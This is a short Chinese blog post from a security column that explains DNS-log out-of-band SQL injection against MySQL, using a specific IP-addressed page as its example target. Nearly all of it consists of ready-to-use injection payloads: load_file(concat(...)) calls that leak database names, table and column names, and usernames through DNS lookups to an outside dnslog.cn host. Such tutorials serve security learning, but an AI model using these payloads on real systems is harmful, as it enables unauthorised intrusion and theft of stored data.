dns_log进行sql注入回显

最新推荐文章于 2023-08-07 01:13:43 发布

THMAIL

最新推荐文章于 2023-08-07 01:13:43 发布

阅读量398

点赞数

分类专栏：安全

本文链接：https://blog.csdn.net/THMAIL/article/details/109122500

版权

SQL注入数据库安全信息泄露 SQL查询注入防范

关键词由CSDN通过智能技术生成

安全专栏收录该内容

24 篇文章 3 订阅

订阅专栏

以http://59.63.200.79:8022/cat/index.php?id=1为例，

以下语句中单引号有问题，为中文，大家自己修正下：

查询所有数据库名：（以下为步骤，自己理解并写注入sql）

1.select distinct TABLE_SCHEMA from information_schema.TABLES //从information_schema库的TABLES表中获取所有的数据库名；

2.可以使用limit每次回显一个数据库名，比如limit 0,1回显第一个数据库名，也可以将所有数据库名组合一起，一起回显，sql语句应该为：select group_concat(TABLE_SCHEMA) from (select distinct TABLE_SCHEMA from information_schema.TABLES);

3.注入sql应该为and load_file(concat('//',(select group_concat(TABLE_SCHEMA) from (select distinct TABLE_SCHEMA from information_schema.TABLES);),'.jv2knh.dnslog.cn/1.txt'))

查询当前数据库名：

and load_file(concat('//',(select database()),'.jv2knh.dnslog.cn/1.txt'))

查询表名：

1.逐个回显：and load_file(concat('//',(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),’.jv2knh.dnslog.cn/1.txt’))

2.组合成一个字符串回显：and load_file(concat('//',(select group_concat(table_name) from information_schema.tables where table_schema=’security’ limit 0,1),’.jv2knh.dnslog.cn/1.txt’))

查询列名：

and load_file(concat(‘//’,(select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),’.jv2knh.dnslog.cn/1.txt’))

查询数据：

and load_file(concat(‘//’,(select username from users limit 0,1),’.jv2knh.dnslog.cn/1.txt’))